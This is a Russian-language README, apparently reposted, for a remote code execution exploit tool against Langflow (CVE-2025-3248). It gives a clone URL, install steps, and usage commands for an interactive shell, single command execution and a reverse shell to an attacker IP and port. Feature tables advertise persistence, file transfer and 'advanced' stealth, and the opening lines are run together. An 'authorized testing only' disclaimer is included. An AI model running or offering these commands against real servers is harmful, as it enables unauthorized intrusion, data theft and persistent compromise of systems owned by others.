
Эксплойт удаленного выполнения кода для Langflow (CVE-2025-3248) - [ от S4Tech ]
Эксплойт удалённого выполнения кода для Langflow (CVE-2025-3248)
persist)upload local_path remote_pathdownload remote_path local_pathclear для очистки терминалаUser-AgentX-Forwarded-Forexploit_log.txt.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [options]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Изображение.png)
⚠️ Этот инструмент предназначен только для образовательного и авторизованного тестирования.
⚠️ Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным.
Этот проект лицензирован по лицензии MIT — подробнее см. в файле LICENSE.
Приветствуются pull-реквесты. Для серьёзных изменений сначала откройте issue, чтобы обсудить, что вы хотели бы изменить.
| Функция | v1.0 | v2.0 |
|---|
| Методы полезных нагрузок | 1 | 5 |
| Передача файлов | ❌ Не поддерживается | ✅ Поддерживается |
| Постоянство | ❌ | ✅ |
| Уровень скрытности | Базовый | Продвинутый |
| Журналирование сессий | ❌ | ✅ |
| Опция | Описание |
|---|
--shell | Запустить интерактивную оболочку |
--reverse IP PORT | Запустить обратную оболочку на указанный IP:PORT |
--command CMD | Выполнить одну команду |
--verbose | Включить подробный вывод |
--timeout SEC | Установить тайм-аут запроса (по умолчанию: 10 с) |